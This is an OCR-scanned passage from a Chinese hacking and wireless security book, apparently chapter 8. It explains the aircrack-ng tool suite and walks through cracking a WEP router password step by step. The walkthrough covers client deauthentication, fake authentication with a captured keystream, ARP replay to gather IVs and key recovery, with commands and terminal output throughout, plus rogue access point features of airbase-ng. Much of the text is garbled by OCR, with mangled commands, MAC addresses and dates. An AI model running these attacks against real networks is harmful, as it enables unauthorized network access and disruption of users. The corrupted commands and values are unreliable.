B4:15:13:8C:106:A2 FO:79:E8:4]1:86:@7 -1 le- @ 日 2 

E4:68:A3:7D:37:92 1C:DD:EA:93:97:FB -1 le- 6 日 13 


抓 取 指 定数 据 。 运 行 airodump-ng 
-C 2 --bssld 1C:FA:68:01:2F:08 -w wep002 
wlan0mon 命 令 ， 该 命令 只 抓 取信 道 为 1、 
BSSID 的 MAC 地 址 为 1C:FA:68:01:2F:08 的 
流量 包 ， 并 将 抓 取 的 数据 包 保 存 为 wep002 
的 文件 。 下 图 为 运行 结果 。 


第 8 章 ”无 线路 由 器 的 密码 安全 策略 ”于 时 


CH 1 ][ Elapsed: 6 s ][ 2918-19-13 67:11 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E55ID 
1C:FA:68:01:2F:08 "1 8 9 23 4 1 :1 WEP WEP <length: @> 
BSSID STATION PWR Rate Lost Frames Probe 


1C:FA:68:01:2F:88 DC:6D:CD:566:FE:CB -16 


8 - 6e 29 30 


侈 提示 : 抓 取 数据 分 为 两 块 显 示 ， 第 一 /4 


BSSID 代 表 AP 端 的 数据 ， 
表 STA 端 的 数据 ， 当 指定 信 


第 二 个 BSSID 代 
言 道 抓 取 数 据 后 会 


多 出 一 个 RXQ 字 段 。 


捕获 认证 过 程 。 当 ariodump-ng 工 
具 捕 获 到 STA 与 AP 的 认证 过 程 ， 会 多 出 
keystream 宁 段 ， 该 字段 也 被 称 为 客 钥 流 ， 
便 有 可 能 计算 出 无 线路 由 的 认证 密码 ， 如 
下 图 所 示 。 


BSSID 


B55ID 


CH 1 ][ Elapsed: 42 s ][ 2918-19-13 g7:38 ][ 149 bytes keystream: 1C:FA:68:91:2F:08 


1C:FA:68:01:2F:08 = 是、 二 和 121 77 3 


1C:FA:68:01:2F:08 DC:6D:CD:66:FE:CB -14 0 - 5e 5 


PWR RxQ Beacons #Data, 凌 /Ss CH MB ENC CIPHER AUTH ESSID 


1 S4e, WEP WEP SKA Test-@01 


STATION PWR Rate Lost Frames Probe 


189 Test-991 
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Wp iay hE 


WPA2 秘 钥 。 i 
不 同 的 发 包 方式 ， 用 于 获取 WPA 握 手包 ， 虽 48 


oe 


aireplay-ng 里 包含 了 很 多 种 ee 和 


aireplay-ng 当 前 文 持 的 发 包 种 类 有 9 种 ， 如 
下 图 所 示 。 


Attack modes (numbers can still be used): 

--deauth count : deauthenticate 1 or all stations (-0) 
--fakeauth delay : fake authentication with AP (-1) 
--interactive ; interactive frame selection (-2) 
--arpreplay ; Standard ARP-request replay (-3) 
--Chopchop : decrypt/chopchop WEP packet (-4) 
--fragment : generates valid keystream (-5) 
--Caffe-latte : query a client for new IVS (-6) 
--Cfrag : fragments against a client (-7) 
--migmode : attacks WPA migration mode (-8) 
--test : tests injection and quality (-9) 
--help : Displays this usage screen 


下 面 详细 介绍 发 包 种 类 中 各 个 参数 的 


含义 。 


--deauth count: 解除 认证 。 

--fakeauth delay: 伪造 认证 。 
--interactive: 交互 式 注 入 。 
--arpreplay: ARP 请 求 包 重 放 。 
--chopchop: 端点 发 包 。 

--fragment: 全 片 交错 。 

--caffe-latte: 查询 客户 端 以 获取 新 
的 IVs。 
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二 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


e --cfrag: 面 回 客 户 的 碎片 。 

e --migmode: WPA 渤 移 模式 。 

e --test: 测试 网 卡 可 以 发 送 哪 种 类 型 

的 数据 包 。 

除了 解除 认证 〈-0) 和 伪造 认证 〈-1) 
以 外 ， 其 他 所 有 发 包 都 可 以 使 用 下 面 的 过 
滤 选 项 来 限制 数据 包 的 来 源 。-b 是 最 常用 的 
一 个 过 滤 选 项 ， 它 的 作用 是 指定 一 个 特定 
的 接 入 点 。 下 图 为 帮助 信息 。 


Filter options: 
-b bssid : MAC address, Access Point 
-d dmac : MAC address, Destination 
-5S Smac : MAC address, Source 
-m Len : minimum packet Length 
-n Len : maximum packet Length 
-U type : frame control, type field 
-Vv Subt : frame control, subtype field 
-七 tods : frame control, To DS bit 
-f fromds : frame control, From DS bit 
iswep : frame control, WEP bit 
: disable AP detection 


主要 参数 介绍 如 下 ， 
-b bssid : 接 入 点 的 MAC 地 址 。 
-d dmac: 目的 MAC 地 址 。 
-s smac: 源 MAC 地 址 。 
-m len: 数据 包 最 小 长 度 。 
-nlen: 数据 包 最 大 长 度 。 
-U type: 含有 关键 词 的 控制 帧 。 
-Vsubt: 含有 表单 数据 的 控制 帧 。 
-ttods: 到 目的 地 址 的 控制 帧 。 
-f fromds: 从 目的 地 址 出 发 的 控 
制 帧 。 
e -Ww iswep: 含有 WEP 数 据 的 控制 帧 。 
当 需 要 重 放 (注入 ) 数据 包 时 ， 会 用 
到 重 放 选 项 中 的 参数 ， 但 是 并 不 是 每 一 种 
发 包 都 能 使 用 所 有 的 选项 。 下 图 为 重 放 选 
项 帮助 信息 。 


Replay options: 


-x Nbpps : number of packets per second 
-p fctrl : set frame control word (hex) 
-a bssid : set Access Point MAC address 
-C dmac : Set Destination MAC address 
-h smac : Set Source MAC address 
-g value : change ring buffer size (default: 8) 
-F : Choose first matching packet 


Fakeauth attack options: 


-e esSsid : set target AP SSID 
-0O npckts : number of packets per burst (0=auto, default: 1) 


-0 Sec : Seconds between keep-alives 

= 用 : Send reassociation requests 

-y prga : keystream for shared key auth 

-Tn : exit after retry fake auth request n time 


Arp Replay attack options: 


-| : inject FromDS packets 
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主要 参数 介绍 如 下 : 
e -x nbpps: 设置 每 秒 发 送 数据 包 的 
数目 。 
e -p fctrl: 设置 控制 帧 中 包含 的 信息 
(十 六 进 制 〉。 
-a bssid: 设置 接 入 点 的 MAC 地 址 。 
-c dmac: 设置 目的 MAC 地 址 。 
-h smac: 设置 源 MAC 地 址 。 
-g value: 修改 缓冲 区 的 大 小 (默认 
值 : 8) 。 
-F: 选择 第 一 次 匹配 的 数据 包 。 
e -e essid: 虚假 认证 中 ， 设 置 接 入 点 
名 称 。 
e -onpckts: 每 次 发 包 时 包含 数据 包 的 
数量 。 
e -q sec: 设置 持续 活动 时 间 。 
e -y prga: 包含 共享 秘 钥 的 关键 数 
据 流 。 
aireplay-ng 有 两 个 获取 数据 包 来 源 ， 第 
一 个 是 无 线 网 卡 的 实时 通信 流 ， 第 二 个 则 
是 pcap 文 件 。 大 部 分 商业 的 或 开源 的 流量 
捕获 与 分 析 工 具 都 可 以 识别 标准 的 pcap 文 
件 。 从 pcap 文 件 读 取 数据 是 Aireplay-ng 一 
个 经 常 被 忽视 的 功能 。 这 个 功能 可 以 从 捕 
捉 的 其 他 会 话 中 读 取 数据 包 。 注 意 ， 有 很 
多 种 发 包 会 在 发 包 时 生成 pcap 文 件 以 便 重 
复 使 用 。 
当 抓 取 指 定 AP 与 数据 时 ， 如 果 想 要 抓 
取 密 钥 必须 在 AP 与 STA 开 始 建立 关联 时 开 
始 ， 此 时 如 果 已 经 有 合法 关联 的 STA， 为 
了 避免 一 直 等 待 它们 重新 关联 ， 可 以 使 用 
airepaly-ng -0 < 发 包 次 数 > -a <AP 的 MAC 地 
址 > -c <STA 的 MAC 地 址 > wlan0mon 命 令 
运行 效果 如 下 图 所 示 ， 将 已 经 关联 的 STA 与 
AP 断 开 连接 ， 正 常情 况 下 STA 与 AP 会 目 动 
重 连 。 


root@kali:-# al dene ng 本 下 了 -C sent de win Gmon 
23:67:62 Waiting n frame (BSSID: 1C:FA:68:91:2F:68 cha 


23:67:62 Sendin ny ir rectet Dea oh (code 7). STMAC: een [ 2|55 ACKs] 
23:67:63 Sendin (code 7), STMAC: [ss 二 Us [ 08|56 ACK5] 
23:07: le at no + i rected pe rh se 7). STHAC: [DC:6D0:CD:656:FE:CB] [ 9|52 wa 
23:07 Sen ode 7), STMAC: [DC:6D:CD:66:FE:CB] [ 6|58 ACK 


其 中 -0 后 面 的 参数 为 发 包 次 数 ， 如 果 指 


定 为 0 表示 不 停 地 发 送 。-c 后 面 的 参数 为 需 
要 解除 关联 的 客户 端 MAC 地 址 ， 如 果 不 指 
定 将 会 以 广播 的 形式 发 送 ， 解 除 所 有 与 AP 
天 联 的 客户 端 。 

使 用 抓 取 到 的 密 钥 流 进 行 关联 ， 可 以 
使 用 aireplay-ng -1 < 间隔 时 间 > -e <ESSID> 
-y < 密 钥 流 文件 > -a <AP-MAC 地 址 > -h < 需 
要 关联 的 客户 并 MAC 地 址 > 命令 ， 执 行 后 如 
下 图 所 示 。 


oot@kal play-ng -1 60 
B1:2F:98 ee a Pe ey en ie wa 
B4:35:31 Waiting gs 1C:FA:68:6061:2F:68) on channel 1 


B4:35:31 Sending Authe Req 
64:35:31 Authen tication pe 可 i ul 
B4:35:31 Sending encrypted challenge. [ACK] 


st (Shared Key) [ACK] 


984;35;31 Authentic atio n 2/2 success 
B84:35:31 Sending Association Re eque t [ACK] | 
04;35:31 yr ee successful -) (AID: 1) 


当 无 线路 由 使 用 WEP 进 行 加 密 时 ， 
破解 密码 需要 抓 取 大 量 的 IV 值 ， 可 以 采 
用 抓 取 一 段 合 法 ARP 数 据 包 ， 然 后 使 用 
areplay-ng 工 具 发 送 大 量 的 ARP 数 据 包 ， 这 
种 方式 叫 重 放 ， 也 就 是 合理 数据 重复 发 
送 使 得 AP 大 量 回 应 ARP， 在 回应 ARP 数 
据 包 中 包含 IV。 这 种 方式 前 提 是 必须 先 
建立 关联 ， 通 过 重 放 便 可 以 收集 IV 值 。 当 
收集 到 足够 数量 的 IV 时 ， 无 论 多 复杂 的 密 
码 都 可 以 被 计算 出 来 。 执 行 aireplay-ng -3 
-b <AP-MAC 地 址 > -h < 本 机 MAC 地 址 > 
wlan0mon 命 令 便 可 以 开始 重 放 ， 如 下 图 
所 示 。 


oot@kali:~# aireplay-ng -3 -b 1C:FA:68:91:2F:68 -h EB8-4E-96-28-AE-46 wWLangmon 
4 : 49 Waitin ee pe aa (BSSID : ee on channel 1 
ing ARP requests arp-1918-643949 .<c 


ou fe J1d eh wh 和 od i ng to capture repties， 
ad 1464 packets (got 9 ARP reque 


sts and 日 ACKS ) ， nt 9 packets...(6 pps) 


8.2.4 aircrack-ng 工 具 


aircrack-ng 是 一 个 802.11 的 WEP 和 WPA/ 
WPA2-PSK 破 解 程序 工具 。 一 旦 使 用 airo- 
dump-ng 抓 取 足 够 多 的 加 密 数 据 包 以 后 ， 
aircrack-ng 可 以 用 来 破解 WEP 密 铀 。 

aircrack-ng 破 解 WEP 密 铀 有 3 种 方法 ， 
分 别 是 : PTW 方 法、FMS/KoreK 方 法 和 词 
典 比 对 方法 。 

(1) PTW (Pyshkin, Tews, Wein- 
mann) 方法 。 是 破解 WEP 密 钥 的 默认 方 
式 ， 由 两 个 阶段 组 成 。 第 一 个 阶段 是 air- 
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crack-ng 只 使 用 ARP 包 ， 如 果 找 不 到 密 钥 ， 
再 尝试 捕捉 到 的 其 他 数据 包 。 要 知道 ， 并 
不 是 所 有 的 数据 包 都 可 以 用 来 进行 PTW 破 
解 。 目 前 PTW 方法 只 能 破解 40 位 和 104 
位 的 WEP 密 钥 。PTW 方法 的 优点 是 ， 只 
须 很 少 的 数据 包 就 可 以 破解 WEP 密 钥 。 

(2) FMS/KoreK 方法 。 包 含 了 很 多 统 
计 攻 击 方式 ， 并 且 结 合 了 骏 力 破解 方式 。 

(3) 词典 比 对 方法 。 而 对 于 WPA/ 
WPA2-PSK 共享 密 铀 ， 只 有 词典 比 对 这 一 
种 方法 。SEE2 则 可 以 极 大 地 加 速 这 个 漫长 
的 比 对 过 程 。 破 解 WPA/WPA2-PSK 时 ， 需 
要 一 个 四 次 握手 包 作 为 输入 。 对 于 WPA 来 
说 ， 需 要 4 个 包 才 能 完成 一 次 完整 的 握手 ， 
然而 aircrack-ng 只 要 其 中 的 两 个 就 能 够 开 
始 工作 了 。 

使 用 aircrack-ng 命 令 查 看 其 帮助 信息 。 
下 图 为 执行 效果 。 


Aircrack-ng 1.4 - (C) 2006-2018 Thomas d'otreppe 
https://ww.aircrack-ng.org 


usage: aircrack-ng [options] <input filel(s)> 


Common options: 


-a <amode> : force attack mode (1l/WEP, 2/WPA-PSK) 
-e <essid> : target selection: network identifier 
-b <bssid> : target selection: access point's MAC 
-p <nbcpu> : # of CPU to use (default: all CPUs) 
- : enable quiet mode (no status output) 
-C <macs> : merge the given APs to a virtual one 
-L <file> : write key to file. Overwrites file. 


主要 参数 介绍 如 下 : 
e -a <amode>: 强力 攻击 模式 (1/ 
WEP 2/WPA-PSK ) 。 


© -e <esSsSld>: 


符 。 iE 

e -b <bssid>: 目标 选择 : 接 入 点 的 
MAC。 

e -p <nbcpu>: 使 用 的 CPU 默认: 所 
有 CPU) 。 

e -q: 局 用 静音 模式 〈 无 状态 输 
出 ) 。 

e -C <macs>: 将 给 定 的 AP 合并 到 一 
个 虚拟 的 AP。 


e -] <file>: 写 入 文件 密 钥 。 
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目标 选择 : 网 络 标识 堪 愉 澡 


黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


下 图 为 WEP 设 置 相 天 的 选项 。 e -s: 破解 时 显示 密 钥 的 ASCII 值 。 
static WEP cracking options: @ -M <num>: 指定 最 大 使 用 的 IVs 


: search alpha-numeric characters only (初始 回 量 ) 
: Search binary coded decimal chr only 


: search the numeric key for Fritz!BOX @ -D: WEP 伪 装 跳 过 坏 掉 的 密 


<mask> : Use masking of the key (Al:XX:CF:YY) 


<maddr> : MAC address to filter usable packets 钥 流 。 
<nbits> : WEP key length : 64/128/152/256/512 
<index> : WEP key index (1 to 4), default: any e -P <num>: PTW 排 错 :1: 取 消 必 lein 
<fudge> : bruteforce fudge factor, default: 2 
<korek> : disable one attack method (1 to 17) -PTW 
or -x© : disable bruteforce for last keybytes (方式 ) 
: last keybyte bruteforcing (default) @ -|. 只 运行 一 一 
: enable last 2 keybytes bruteforcing 1: 个 运作 次 笠 试 用 PTW 人 破解 
: disable bruteforce multithreading 密 钥 。 


: experimental single bruteforce mode 


: Use only old KoreKk attacks (pre-PTW) © _V. 在 目 视 检查 模式 下 运行 。 


: Show the key in ASCII while cracking 


<num> : Specify maximum number of IVs to use 友 ] > 
: WEP decloak, skips broken keystreams 下 图 为 WEP 和 WPA-PSK 和 破解 选项 。 
<num> : PTW debug: 1: disable Klein, 2: PTW 


' ' 和 ' 1 i ' 1 nl ' ' ' 
人 
人 


: run only 1 try to crack key with PTW © WEP and WPA-PSK cracking options : 
: run in visual inspection mode 


-Ww <words> : path to wordlist(s) filename(s) 


li Ee 
e -c: 只 搜索 字母 数字 字符 。 - 1 
。 -t: 只 搜索 二 进 制 编码 的 十 进 制 主要 参数 介绍 如 下 : 

字符 。 e -w <words>: 路 人 径 表 (s) 的 文件 名 
e -h: 搜索 弗 里 次 的 数字 键 。 (s) 。 | 
e -d <mask>: 使 用 密 钥 过 滤 (A1l:XX: e -N <file>: 新 会 话 文件 名 的 路 径 。 

CF:YY) 。 e -R <file>: 现 有 会 话 文件 名 的 路 径 。 
e -m <maddr>: MAC 地 址 用 以 过 滤 掉 下 图 为 WPA-PSK 的 一 些 选 项 。 

无 用 数据 包 。 WPA-PSK options : 


© -n<nbits>: WEP 密 钥 长 度 。 E <file> : create EWSA Project file v3 
-] <file> : create Hashcat v3.6+ file (HCCAPX) 
64/128/152/256/512 -] <file> : create Hashcat file (HCCAP) 
-S : WPA cracking speed test 
@ -1 <1ndex>: WEP 密 钥 索 弓 | (1~ -Z <sec>  : WPA cracking Speed test Length of 
execution. 
4) 四 默认 值 : 任何 。 -rr <DB> : path to airolib-ng database 


(Cannot be used with -w) 


e -f <fudge>: 筋 举 猜测 因子 ， 默 认 
值 : 2。 主要 参数 介绍 如 下 : 

e@ -k <korek>: 禁用 一 个 攻击 方法 〈1 一 e -E <file>: 创建 项 目 文件 EWSA v3。 
17) 8 e -J <file>: 创建 Hashcat 捕 获 文件 。 

e -x or -x0: 最 后 一 个 密 钥 字 节 进行 穷 。 -S: WPA 破 解 速度 测试 。 
举 (默认 ) 。 . 

。 .x1， 取消 最 后 一 个 密 钥 字 节 的 穷 举 8.2.5 airbase -ng 工具 
(默认 ) 。 airbase-ng 作 为 多 目标 的 工具 ， 通 常 将 

e。 -x2: 设置 最 后 两 个 密 钥 字 节 进行 ”自己 伪装 成 AP 攻 击 客户 端 。 该 工具 的 功能 
穷 举 。 丰富 多 样 ， 常 用 的 功能 特性 如 下 : 

e -Xx: 禁用 多 线程 穷 举 。 e 实施 caffe-latte WEP 攻 击 。 

e -y: 实验 性 的 单一 穷 举 模式 。 。 实施 hirte WEP 客 户 靖 攻击 。 

e -KK: 只 使 用 旧 的 KoreK 攻 击 (pre- e 抓 取 WPA/WPA2 认 证 中 的 handshake 
PTW) 。 数据 包 。 
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伪装 成 AD-Hoc AP。 
完全 伪装 成 一 个 合法 的 AP。 

e 通过 SSID 或 者 和 客户 端 MAC 地 址 进 
行 过 滤 。 

e 操作 数据 包 并 且 重 新 发 送 。 

e 加 密 发 送 的 数据 包 以 及 解密 抓 取 的 

数据 包 。 

该 工具 的 主要 目的 是 让 客户 端 连 接 上 
伪装 的 AP， 而 不 是 阻止 它 连 接 真实 的 AP， 
当 airbase-ng 运 行 时 会 创建 一 个 tap 接 口 ， 这 
个 接口 可 以 用 来 接收 解密 或 者 发 送 的 加 密 
数据 包 。 

一 个 真实 的 客户 端 会 发送 probe re- 
quest, 在 网 络 中 ， 这 个 数据 帧 对 于 绑 定 客 
户 端 到 伪装 AP 上 有 具有 重要 的 意义 。 在 这 
种 情况 下 伪装 的 AP 会 回应 任何 的 probe re- 
quUesSt。 建议 最 好 使 用 过 滤 以 防止 附近 所 有 
的 AP 都 会 被 影响 

下 图 为 airbase-ng 工 具 的 命令 格式 及 参 
数 说 明 。 


Lsage: airbase-ng <options> <replay interface> 
pptions : 
-a bssid : Set Access Point MAC address 
-i iface : Capture packets from this interface 
-W WEP key : Use this WEP key to en-/decrypt packets 


-h NMAC : Source mac for MITM mode 
-f disallow : disallow specified client MACS (default: allow) 

-W 8@|1 : [don't] set WEP flag in beacons 09|1 ldefault: auto) 
-器 : guiet [do not print statistics) 

: Verbose (print more messages) 

: Ad-Hoc Mode (allows other clients to peer) 

: external packet processing 

: sets the channel the AP is running on 

: hidden ESSID 

: force shared key authentication (default: auto) 

: set shared key challenge length (default: 128) 


A 
-Y in|out|both 

和 

xX 

5 

- 

= : Caffe-Latte WEP attack (use if driver can't send frags) 
N 

X 

y 

9 


-Cc channel 


: Cfrag WEP attack (recommended) 

: number of packets per second (default: 199) 
: disables responses to broadcast probes 

: Set all WPA,WEP,open tags. can't be used with -z & -Zz 
: Sets WPA1 tags. JI=WEP48 2=TKIP 3=WRAP 4=CCMP 5=WEP184 


Z Type 

Z Type : Same as -Z，but for WPA2 

V type : fake EAPOL 1=MD5 2=SHA1 3=auto 

F prefi : write all sent and received frames into pcap file 


: respond to all probes, even when specifying ESSIDs 

: Sets the beacon interval value in ms 

: enables beaconing of probed ESSID values (requires -P) 
: User specified ANonce i 


e -a: 设置 软 AP 的 ssid。 

e -i: 接口 ， 从 该 接口 抓 取 数 据 包 。 

e -w: 使 用 WEP key 加 密 / 解 密 数 
据 包 。 

e -h MAC: 源 MAC 地 址 (在 中 间 人 攻 
击 时 的 MAC 地 址 ) 。 


-I interval 
-C seconds 


when doing the 4-way handshake 


第 8 章 ”无 线路 由 器 的 密码 安全 策略 一 人 人 


-f disallow: 不 容许 某 个 客户 端的 
MAC 地 址 〈 默 认为 容许 ) 。 

-W 0|1: 不 设置 WEP 标 志 在 beacon 
(默认 容许 ) 。 

-q: 退出 。 

-V (〈--verbose) : 显示 进度 信息 。 
-A: ad-hoc 对 等 模式 。 

-Y inloutlboth: 数据 包 处 理 。 

-c: 信道 。 

-X: 隐藏 ESSID。 

-s: 强制 的 将 认证 方式 设 为 共享 密 
钥 认 证 。 

-S: 设置 共享 密 钥 的 长 度 ， 默 认为 
128bit。 


e -L: caffe-Latte 攻 击 。 
e -N: hirte 攻 击 ， 产 生 ARP request 


against WEP 客 户 端 。 


e -xnbbps: 每 秒 的 数据 包 。 
e -y: 不 回应 广播 的 probes request 


(只 回应 携带 SSID 的 单 播 probe 
request) 。 
-Z: 设置 WPA1 的 标记 ，1 为 WEP40， 
2 为 TKIP，3 为 WRAP，4 为 CCMP， 
5 为 WEP104( 即 不 同 的 认证 方 
Rs 
-Z: 和 -z 作 用 一 样 ， 
WPA2。 
-V: 欺骗 EAPOL，1 为 MD5，2 为 
SHA1，3 为 自动 。 
-F xxx: 将 所 有 收 到 的 数据 帧 放 到 文 
件 中 ， 文 件 的 前 级 为 xxx。 
-P: 回应 所 有 的 probes request， 包 括 
特殊 的 ESSID。 
-I: 设置 beacon 数 据 帧 的 发 送 间 隔 ， 
单位 ms。 
-C: 开启 对 ESSID 的 beacon。 


只 是 针对 


下 图 为 Airbase-ng 工 具 的 文件 选项 


说 明 。 
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黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


FilTter options: 


--bssid MAC : BSSID to filter/use 
--bssids file : read a list of BSSIDs out of that file 
--Client MAC : MAC of client to filter 


: read a list of MACs out of that file 
: specify a single ESSID (default: default) 
: read a list of ESSIDs out of that file 


--Clients file 
--essid ESSID 
--essids file 


主要 参数 介绍 如 下 : 

© --bssid MAC|: 

e --bssids file: 根据 文件 中 的 BSSID 来 

e --client MAC: 让 制定 MAC 地 址 的 客 
户 端 连接 。 

e --clients file: 让 文件 中 的 MAC 地 址 
的 客户 端 可 以 连接 上 。 

e --essid ESSID: 创建 一 个 特殊 的 
上 SNSID 。 


© --esSslds file: 


ESSID 来 过 滤 。 


具 破 解 无 线路 由 冀 


根据 AP 的 MAC 来 


根据 一 个 文件 中 的 


8.3 ”使 用 工 
密码 


无 线路 由 器 密码 的 安全 强度 是 进入 
无 线 网 络 的 关键 ， 要 想 从 无 线路 由 右 进 入 
内 网 ， 就 必须 知道 无 线路 由 器 的 密码 ， 使 
用 一 些 破 解 工 具 可 以 破解 出 无 线路 由 器 的 


使 用 aircrack-ng 破 解 WEP 密 码 
使 用 aircrack-ng 工 具 可 以 破解 WEP 加 密 


方式 的 无 线路 由 密码 。 破 解 之 前 ， 首 先 登录 


无 线路 由 器 ， 在 “无 线 设置 ”中 将 “无 线 安 
全 设置 ”设置 成 WEP 加 密 ， 如 下 图 所 示 。 
修改 加 密 方 式 后 需 重 启 路 由 器 才能 生效 。 


四 WEP 
认证 类 型 : 
YET 密 钥 格式 : 
密 钥 选择 是 P 密 钥 窗 角 类 型 
密 角 1: ® 


密 钥 2: [ |j[ 多 上 "| 
密 钥 3: [| |j[ 禁 用 "| 
密 钥 4: EE 
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破解 WEP 密 码 的 具体 操作 步骤 如 下 : 
执行 airmon-ng strat wlan0 命 令 ， 局 
动 网 卡 并 进入 monitor 模 式 ， 下 图 为 执行 
效 采 。 


rootakali:-~# airmon-ng start wlang 


PHY Interface Driver Chipset 
phy1 wlang rt2880usb Ralink Technology, Corp. RT2876/RT3676 


[mac8B211 monitor 
[mac8B211 station 


mode vif enabled for [phyljwlanB on [phyl]jwLangmon) 
mode vif disabled for |phy1l]jwLane) 


执行 airodump-ng -c < 信道 > --bssid 
<AP-MAC 地 址 > -w < 保存 文件 名 > 
Wlan0mon 命 令 ， 启 动 数 据 抓 包 功 能 ， 并 保 
存 抓 取 后 的 文件 ， 如 下 图 所 示 。 


CH 1 ][ Elapsed: 6 5 ][ 2918-16-18 64:68 


BSSID PWR RxD Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
1C:FA;68:91:2F;68 -B 48 25 3 日 1 54e，WEP WEP Test-691 
BSSID STATION PWR Rate Lost Frames Probe 


1C:FA:68:01:2F:08 DC:6D:CD:66:;:FE:CB -12 日 - 6e 8 了 


如 果 AP 与 STA 有 关联 ， 可 以 使 用 
arieplay-ng -0 1 -a <AP-MAC 地 址 > -c < 已 连 
接 STA-MAC 地 址 > wlan0mon 命 令 ， 执 行 该 
命令 后 ， 会 解除 AP 与 STA 的 关联 ， 如 下 图 
所 示 。 


root@kali:~# aireplay- a -9 1 -a 1C:FA:59:B1:2F:98 -C DC:65D:CD:56:FE:CB wlanemon 
64:15:66 Waiting for beacon frame (BSSID: 1C:FA:68:01:2F:88) on channel 
64:15:967 Se ndin na 64 ee DeAuth (code 7)- STMAC: [DC:6D:CD:66:FE:CB] [ 6|155 ACKS] 


此 时 会 抓 取 到 AP 与 STA 关 联 时 的 密 铀 
流 ， 下 图 为 抓 取 的 窗 钥 流 。 


CH 1 ][ ELapsed: 3 mins ][ 2818-18-18 6b4:12 ][ 146 bytes keystream: 1C:FA:68:0]1:2F:88 
BSSID PWR RXx0 Beacons #Data, #/5 CH MB ENC CIPHER AUTH ESSID 
1C:FA:68:01:2F:08 BB 58 986 164 4 1 S4e. WEP WEP SKA Test+t-691 
BSSID STATION PWR Rate Lost Frames Probe 
1C:FA:68:01:2F:Q8 DC:6D:CD:66:FE:CB -14 9 - 9e 22 159 


执行 ls 命令， 查看 当前 目录 可 以 发 现 
rap et 文件 ， 这 个 文件 保存 着 
STA 关 联 AP 的 帘 钥 流 ， 如 下 图 所 示 。 


root@kali:~# Ts 
esktop Pictures 

pocunents Public 
ownloads Templates 

Music Videos 


wep-61-1C-FA-68-91-2F-08.xor wep-6l1,.Kkismet.netxml 
wep-0l.cap 

wep-0l.csv 

wep-01.kismet.csyv 


利用 XOR 文 件 与 AP 建立 关联 ， 一 
写 ppg 窗 钥 流 便 可 以 将 任意 主机 与 AP 
进行 关联 ， 使 用 aireplay-ng -1 < 间隔 时 
间 > -e <ESSID> -y < 密 钥 流 文件 > -a <AP- 
MAC 地 址 > -h < 需要 建立 关联 的 MAC 地 
址 > wlan0mon 命 令 ， 可 以 使 本 机 与 AP 建立 
关联 ， 如 下 图 所 示 。 


root®@kali:~# alreptay-ng -1 66 -e Test-086] -y wep-6bl-l1C-FA-68-01-2F-68.xor -a 1C:FA:68: 
61:2F:68 -h E8-4E-66-28-AE-46 wlanemon 
984;35;:31 Waiting for beacon frame [BSSID: iC:FA:68:;01:2F:;:88) on channel 1 


B84;:35:31 Sending Authentication Request (Shared Key) [ACK] 
B4:35:31 Authentication 1/2 successful 

94:35:31 Sending encrypted challenge. [ACK] 

64:35:31 Authentication 2/2 successful 

04:35:31 Sending Association Request [ACK] | 
B84;35;31 Association successful ;-) (AID: 1) 


执行 ARP 重 放 收 集 IV 数 据 ， 执 行 ARP 
重 放 需要 先 获取 一 个 有 效 ARP 数 据 ， 本 机 
只 是 与 AP 建 立 了 关联 并 不 能 进行 通信 ， 所 
以 还 需要 抓 取 一 个 有 效 ARP 通 信 ， 此 时 可 
以 执行 aireplay-ng -3 -b <AP-MAC 地 址 > -h 
< 本 机 MAC 地 址 > wlan0mon 命 令 ， 如 下 图 
所 示 。 


oot@kali:-~# aireplay-ng -3 -b 1C:FA:68:91:2F:68 -h EB-4E-96-28-AE-46 wlanemon 
4:39:49 Waiting for beacon frame (BSSID: 1C:FA:68:01:2F:08) on channel 1 
aving ARP requests in replay arp-1618-9643949 .cap 
ou should also start airodunp-ng to capture replies,., 

ad 1464 packets (got 9 ARP requests and 9 ACKs), sent 8 packets...(9 pps) 


[step 较 再 次 解除 AP 与 STA 关 联 ， 触 发 真实 
的 ARP 数 据 包 ， 产 生 以 replay arp 开 头 的 文 
件 ， 如 下 图 所 示 。 


半生 1s 


Desktop Pictures replay arp-1918-914337 ,cap 
Documents Public Templates wep-91,.csv 

Downloads replay arp-19818-812769,.cap Videos wep-91,Kkismet,csyv 
usic replay arp-1918-913325,cap wep-61-1C-FA-66-91-2F-98.xor wep-61,kismet.netxm\ 


wep-91,cap 


当 产 生 这 个 ARP 合 法 数据 包 后 ， 便 会 
开始 真正 的 ARP 重 放 ， 如 下 图 所 示 。 


root@kali;-# aireplay-ng -3 -b 1C:FA;68;:91;2z2F:98 -h E8-4E-66-28-AE-46 WLangmon 
|B4:44:21 Waiting for beacon frame (BSSID: 1C:FA:68:91:2F:08) on channel 1 
Saving ARP requests in replay arp-16018-644422 ,cap 

You should also start airodump-ng to capture replies. 

ead 16658 packets [got 2418 ARP requests and 3666 ACKs), sent 4252 packets...(499 pps) 


尽量 多 的 收集 TV， 收集 的 IV 值 越 多 越 
容易 破解 出 密码 ， 如 下 图 所 示 。 


cH 1 ][ Elapsed: 34 mins ][ 2818-10-18 62:867 ][ 146 bytes keystream: 1C:FA:68:01:2F:08 


BSSID PWR RXQ Beacons #0Data, #/5 CH MB ENC CIPHER AUTH ESSID 


1C:FA:68:91:2F:98 8 54 1239B 144526 8 1 5S4e. WEP WEP SKA Test-991 


BSSID STATION PWR Rate Lost Frames Probe 
1lC;FA:68;01:;2F:;88 E68;4E;06:;28:;AE:46 9 8- 1 日 1319964 
1C:FA:68:01:2F:88 DC:6D:CD:66:FE:CB "2 le- 6 | 3194 Test-691 


使 用 aircrack-ng 工 具 破 解密 码 ， 该 
密码 为 KEY FOUND1!。KEY FOUNDI 后 
面 方 括号 中 是 密码 的 十 六 进 制 形式 ， 之 后 
ASCII: 后 面 便 是 常用 的 字符 串 密 码 ， 如 下 
图 所 示 。 


Aircrack-ng 1.4 


[86:66:B6] Tested 511 keys (got 142782 IVs) 


KB depth byte(vote) 
6 4/ 7 5D0(157446) 28(155648) 58(155392) BCf(154368) BE(154112) 
1 2/ 1 76[159488) ED(156928) 53(156572) D2(1565416) 79(155136) 
2 @/ 1 96[(199168) 27(158976) 92(158976) 7C(157696) Bl1(157184) 
3 59/ 3 F611474565) 29(146944) 3E(146944) 65(146944) 68(145944) 
4 2f 马 A5(158608) SB(159488) C4(158976) 3C(156416) B4(155648) 


KEY FOUND! [ 31:32:33:34:35:36:37:38:39:36:31:32:33 ] 【ASCII: 1234567899123 ) 
